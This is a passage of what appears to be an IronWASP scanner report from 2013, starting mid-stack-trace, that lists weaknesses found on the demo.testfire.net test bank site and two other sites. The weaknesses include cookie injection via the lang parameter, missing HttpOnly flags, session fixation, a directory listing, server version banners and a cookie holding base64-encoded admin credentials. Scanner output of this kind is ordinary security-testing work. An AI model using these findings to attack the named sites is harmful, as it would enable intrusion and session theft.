at MS.Internal.Xml.XPath.XPathParser.ParseEqualityExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseAndExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseOrExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParsePredicate(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseLocationPath(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParsePathExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseUnionExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseUnaryExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseMultiplicativeExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseAdditiveExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseRelationalExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseEqualityExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseAndExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseOrExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseMethod(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseFilterExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParsePathExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseUnionExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseUnaryExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseMultiplicativeExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseAdditiveExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseRelationalExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseEqualityExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseAndExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseOrExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseXPathExpresion(String xpathExpresion)
at MS.Internal.Xml.XPath.QueryBuilder.Build(String query, Boolean allowVar, Boolean allowKey)
at MS.Internal.Xml.XPath.QueryBuilder.Build(String query, Boolean&amp; needContext)
at System.Xml.XPath.XPathExpression.Compile(String xpath, IXmlNamespaceResolver n[---- Snipped parts of HTTP body section for brevity ----]
Charset Not Set By Server
Type:Vulnerability
Severity:Medium
Confidence:Medium
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/admin/
Affected Parameter:
Parameter Location:URL
Description:
The Charset of the response content is not explicitly set by the server. Lack of charset can cause the browser to guess the encoding type and this could lead to Cross-site Scripting by encoding the payload in encoding types like UTF-7.
The relevant parts of the requests/responses pairs associated with the check that discovered this issue are available below.
Information about the Response from the Server:

This response does not have an explicit declaration for what character encoding is used in it.

Cross-site Cookie Setting
Type:Vulnerability
Severity:Medium
Confidence:Medium
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/bank/customize.aspx?lang=international
Affected Parameter:lang
Parameter Location:Query
Description:
Cross-site Cookie Setting was identified in the lang parameter of the Query section of the scanned request.. The value of this parameter is returned in the Set-Cookie header
The relevant parts of the requests/responses pairs associated with the check that discovered this issue are available below.
Request sent by Scanner:

The payload in this request is random string just to check where this value it is reflected back in the response.

GET http://demo.testfire.net/bank/customize.aspx?lang=www40wwwwww HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786;amUserId=;amCreditOffer=;lang=



Response from the Server:

The random string from the payload has been found in the Set-Cookie header of this response

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:43:24 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: lang=www40wwwwww; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5881

[---- Snipped parts of HTTP body section for brevity ----]">


<div class="fl" style="width: 99%;">

<h1>Customize Site Language</h1>

<form name="aspnetForm" method="post" action="customize.aspx?lang=www40wwwwww" id="aspnetForm">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMjA2OTMxMDA4ZGQ=" />

<p>
<span id="_ctl0__ctl0_Con[---- Snipped parts of HTTP body section for brevity ----][---- Snipped parts of HTTP body section for brevity ----]MjA2OTMxMDA4ZGQ=" />

<p>
<span id="_ctl0__ctl0_Content_Main_Label1">Curent Language: </span>
<span id="_ctl0__ctl0_Content_Main_langLabel">www40wwwwww</span>
</p>

<p>
<span id="_ctl0__ctl0_Content_Main_Label2">You can change the language setting by choosing:</span>
</p>

<p>
<a [---- Snipped parts of HTTP body section for brevity ----]
Cookie amSessionId missing the HttpOnly flag
Type:Vulnerability
Severity:Medium
Confidence:High
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/
Description:
The HttpOnly flag was missing on the cookie: amSessionId. This may allow an attacker to get the cookie information using XSS attacks.
Analyzed Response:

The value of the cookie is not protected by HttpOnly flag and hence becomes accessible from JavaScript

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 20:31:03 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: amSessionId=15313501853; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 9953


Sensitive Form loaded and submitted Insecurely
Type:Vulnerability
Severity:Medium
Confidence:High
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/bank/login.aspx
Description:
Form with sensitive contents, which includes password fields, is loaded and submitted over HTTP
Analyzed Request:

This Request was made over HTTP

GET http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Referer: http://demo.testfire.net/default.aspx?content=inside_contact.htm
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=ugzk5l45izkxuvmpui4xlt55; amSessionId=15313501853



Interesting part of Analyzed Response:

The HTML form containing password fields is displayed below. The unnecessary elements from this form have been stripped away for clarity.

IronWASP is not able to automatically highlight the interesting section of the Response, you would have to identify it manually.
IronWASP's Passive Analyzer reported the following text as being of interest in this case:

----- START OF INTERESTING TEXT -----
<form action="login.aspx" method="post" name="login" id="login" onsubmit="return (confirminput(login));"><input type="text" id="uid" name="uid" value="" style="width: 150px;"><input type="password" id="passw" name="passw" style="width: 150px;"><input type="submit" name="btnSubmit" value="Login"></form>
----- END OF INTERESTING TEXT -----

Session Fixation Found
Type:Vulnerability
Severity:Medium
Confidence:Low
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/bank/login.aspx
Description:
The application does not set a new Session ID in the cookie after what appears to be an authentication attempt by the user. If this was a successful login and the Session IDs are stored in cookies then this application is affected by Session Fixation vulnerability.
Cookie amUserInfo missing the HttpOnly flag
Type:Vulnerability
Severity:Medium
Confidence:High
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/bank/login.aspx
Description:
The HttpOnly flag was missing on the cookie: amUserInfo. This may allow an attacker to get the cookie information using XSS attacks.
Analyzed Response:

The value of the cookie is not protected by HttpOnly flag and hence becomes accessible from JavaScript

HTTP/1.1 302 Found
Date: Mon, 16 Sep 2013 20:31:29 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: amUserInfo=UserName=YWRtaW4=&Password=YWRtaW4=; expires=Mon, 16-Sep-2013 23:31:29 GMT; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 136


Cookie amUserId missing the HttpOnly flag
Type:Vulnerability
Severity:Medium
Confidence:High
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/bank/login.aspx
Description:
The HttpOnly flag was missing on the cookie: amUserId. This may allow an attacker to get the cookie information using XSS attacks.
Analyzed Response:

The value of the cookie is not protected by HttpOnly flag and hence becomes accessible from JavaScript

HTTP/1.1 302 Found
Date: Mon, 16 Sep 2013 20:31:29 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: amUserId=1; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 136


Cookie lang missing the HttpOnly flag
Type:Vulnerability
Severity:Medium
Confidence:High
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/bank/customize.aspx
Description:
The HttpOnly flag was missing on the cookie: lang. This may allow an attacker to get the cookie information using XSS attacks.
Analyzed Response:

The value of the cookie is not protected by HttpOnly flag and hence becomes accessible from JavaScript

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 20:31:36 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: lang=; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 6056


Directory Listing at : /bank/
Type:Vulnerability
Severity:Medium
Confidence:Medium
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/bank/
Description:
A directory listing vulnerability was found at /bank/
A directory listing provides an attacker with the complete index of all the resources locatedinside of the directory. The specific risks and consequences vary dependingon which files are listed and accessible.
References:
CWE-548: Information Exposure Through Directory Listing
Analyzed Response:

Text found in this response body indicates that there is Directory Listing on the server

HTTP/1.1 200 OK
Content-Length: 2364
[---- Snipped parts of HTTP headers section for brevity ----]
Date: Mon, 16 Sep 2013 20:31:40 GMT

[---- Snipped parts of HTTP body section for brevity ----] content="text/html; charset=UTF-8"><title>demo.testfire.net - /bank/</title></head><body><H1>demo.testfire.net - /bank/</H1><hr>

<pre><A HREF="/">[To Parent Directory]</A><br><br> 5/31/2007 12:10 PM &lt;dir&gt; <A HREF="/bank/20060308_bak/">20060308_bak</A><br> 1/12/2011 11:14 PM 1831 <A HREF="/bank/a[---- Snipped parts of HTTP body section for brevity ----]
Server leaks version number
Type:Vulnerability
Severity:Low
Confidence:High
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/
Description:
The Web Server's banner contains the version number of the server - Microsoft-IIS/6.0. The version number found is 6.0
Analyzed Response:

The Server header of this Response indicates the server version as 6.0

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 20:31:03 GMT
Server: Microsoft-IIS/6.0
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 9953


AutoComplete Enabled on Password Fields
Type:Vulnerability
Severity:Low
Confidence:High
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/bank/login.aspx
Description:
AutoComplete feature has not been disabled on the form/fields that accept Passwords from users
Information about the Analyzed Response:

This response contains INPUT elements whose type attribute is password but their autocomplete attribute is not set to 'off'

DOM XSS Sources found
Type:Test Lead
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/default.aspx?content=inside_contact.htm
Description:
DOM XSS Sources were found in the Body of the Response. Analyze the Response for presence of DOM XSS
Sources:
open
.open(
Analyzed Response:

2 DOM XSS Sources and 0 DOM XSS Sinks were found in the JavaScript contained in this response body

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 20:31:17 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 10815

[---- Snipped parts of HTTP body section for brevity ----]ost efficient method of contact.
If you are requesting a change to your account, please call the phone number listed below.</p>

<h2>Phone</h2>
<p>To open a new account, please call:<br />
1.888.245.5550<br />
8:00 a.m. - 6:00 p.m., Eastern Time, Monday - Friday</p>

<p>For assistance with your account,[---- Snipped parts of HTTP body section for brevity ----][---- Snipped parts of HTTP body section for brevity ----]8 or later, Netscape Communicator 4.7 or later, and Microsoft Internet Explorer 4.5 or later.</li>
</ul>
<p>Go to <a title="Netscape" onclick="window.open('disclaimer.htm?url=http://www.netscape.com', '_blank', 'status=no,location=no,menubar=no,resizable=no,scrollbars=no,toolbar=no,width=450,height=200'[---- Snipped parts of HTTP body section for brevity ----][---- Snipped parts of HTTP body section for brevity ----]0,height=200'); return false;" href="disclaimer.htm?url=http://www.netscape.com" target="_blank">Netscape</a> or <a title="Microsoft" onclick="window.open('disclaimer.htm?url=http://www.microsoft.com', '_blank', 'status=no,location=no,menubar=no,resizable=no,scrollbars=no,toolbar=no,width=450,height=200[---- Snipped parts of HTTP body section for brevity ----]
Cookie amUserInfo may contain sensitive information
Type:Test Lead
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/bank/login.aspx
Description:
The cookie: amUserInfo might contain sensitive information which could be easily accessed or modified to exploit the web application.
Analyzed Response:

The cookie name or value indicates that it could hold important information

HTTP/1.1 302 Found
Date: Mon, 16 Sep 2013 20:31:29 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: amUserInfo=UserName=YWRtaW4=&Password=YWRtaW4=; expires=Mon, 16-Sep-2013 23:31:29 GMT; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 136


Cookie amUserId may contain sensitive information
Type:Test Lead
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/bank/login.aspx
Description:
The cookie: amUserId might contain sensitive information which could be easily accessed or modified to exploit the web application.
Analyzed Response:

The cookie name or value indicates that it could hold important information

HTTP/1.1 302 Found
Date: Mon, 16 Sep 2013 20:31:29 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: amUserId=1; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 136


Runs on Microsoft-IIS/6.0
Type:Information
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/
Description:
The Web Server returned this banner in its response headers - Microsoft-IIS/6.0
Analyzed Response:

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 20:31:03 GMT
Server: Microsoft-IIS/6.0
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 9953


Technologies identified on Server
Type:Information
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/images/pf_lock.gif
Description:
The server makes use of the following technologies:
- ASP.NET
Analyzed Response:

HTTP/1.1 200 OK
Content-Length: 76
[---- Snipped parts of HTTP headers section for brevity ----]
X-Powered-By: ASP.NET
Date: Mon, 16 Sep 2013 20:31:04 GMT


http://html5security.org/
Server leaks version number
Type:Vulnerability
Severity:Low
Confidence:High
Found By:Passive Analysis

Affected Site:http://html5security.org/
Affected Url:/
Description:
The Web Server's banner contains the version number of the server - Microsoft-IIS/7.0. The version number found is 7.0
Analyzed Response:

The Server header of this Response indicates the server version as 7.0

HTTP/1.1 200 OK
Content-Type: text/html
[---- Snipped parts of HTTP headers section for brevity ----]
Server: Microsoft-IIS/7.0
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 16744


Runs on Microsoft-IIS/7.0
Type:Information
Found By:Passive Analysis

Affected Site:http://html5security.org/
Affected Url:/
Description:
The Web Server returned this banner in its response headers - Microsoft-IIS/7.0
Analyzed Response:

HTTP/1.1 200 OK
Content-Type: text/html
[---- Snipped parts of HTTP headers section for brevity ----]
Server: Microsoft-IIS/7.0
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 16744


Technologies identified on Server
Type:Information
Found By:Passive Analysis

Affected Site:http://html5security.org/
Affected Url:/
Description:
The server makes use of the following technologies:
- ASP.NET
Analyzed Response:

HTTP/1.1 200 OK
Content-Type: text/html
[---- Snipped parts of HTTP headers section for brevity ----]
X-Powered-By: ASP.NET
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 16744


http://ironwasp.org/
Server leaks version number
Type:Vulnerability
Severity:Low
Confidence:High
Found By:Passive Analysis

Affected Site:http://ironwasp.org/
Affected Url:/
Description:
The Web Server's banner contains the version number of the server - Microsoft-IIS/7.0. The version number found is 7.0
Analyzed Response:

The Server header of this Response indicates the server version as 7.0

HTTP/1.1 200 OK
Content-Type: text/html
[---- Snipped parts of HTTP headers section for brevity ----]
Server: Microsoft-IIS/7.0
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 2766


Runs on Microsoft-IIS/7.0
Type:Information
Found By:Passive Analysis

Affected Site:http://ironwasp.org/
Affected Url:/
Description:
The Web Server returned this banner in its response headers - Microsoft-IIS/7.0
Analyzed Response:

HTTP/1.1 200 OK
Content-Type: text/html
[---- Snipped parts of HTTP headers section for brevity ----]
Server: Microsoft-IIS/7.0
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 2766


Technologies identified on Server
Type:Information
Found By:Passive Analysis

Affected Site:http://ironwasp.org/
Affected Url:/
Description:
The server makes use of the following technologies:
- ASP.NET
Analyzed Response:

HTTP/1.1 200 OK
Content-Type: text/html
[---- Snipped parts of HTTP headers section for brevity ----]
X-Powered-By: ASP.NET
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 2766